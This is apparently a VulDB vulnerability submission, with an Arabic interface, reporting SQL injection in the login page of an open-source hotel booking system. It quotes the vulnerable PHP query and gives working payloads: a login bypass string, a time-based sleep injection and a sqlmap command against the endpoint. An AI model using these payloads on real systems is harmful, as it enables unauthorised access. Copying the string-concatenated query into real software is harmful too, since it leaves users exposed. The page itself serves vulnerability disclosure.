إرسال #42880: SQL injection in Online-Booking-And-Hotel-Management-Systemالمعلومات

عنوانSQL injection in Online-Booking-And-Hotel-Management-System
الوصفin file "login.php" line 50: ``` $Email=$_POST['email']; $pass=$_POST['pass']; $query="SELECT * FROM `employees` WHERE email='$Email'AND mep_password='$pass'"; $runQuery=mysqli_query($conn,$query); $rowQuery= mysqli_num_rows($runQuery); ``` close with <'#>, so send a post request like "[email protected]&pass=admin'#" can successfully login. try WAITFOR DELAY Injection: POST "[email protected]&pass=admin' and sleep(5)#" . The page successfully delayed the response by 5 seconds. try more attacks by <python sqlmap.py -u "xxx/Online-Booking-And-Hotel-Management-System/admin/login.php" --data="[email protected]&pass=admin">
المصدر⚠️ https://github.com/Rifatur/Online-Booking-And-Hotel-Management-System
المستخدم
 binghuang (UID 30681)
ارسال05/08/2022 10:25 AM (4 سنوات منذ)
الاعتدال05/08/2022 12:38 PM (2 hours later)
الحالةتمت الموافقة
إدخال VulDB205657 [Rigatur Online Booking and Hotel Management System aff6409 POST Request login.php email/pass حقن SQL]
النقاط20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!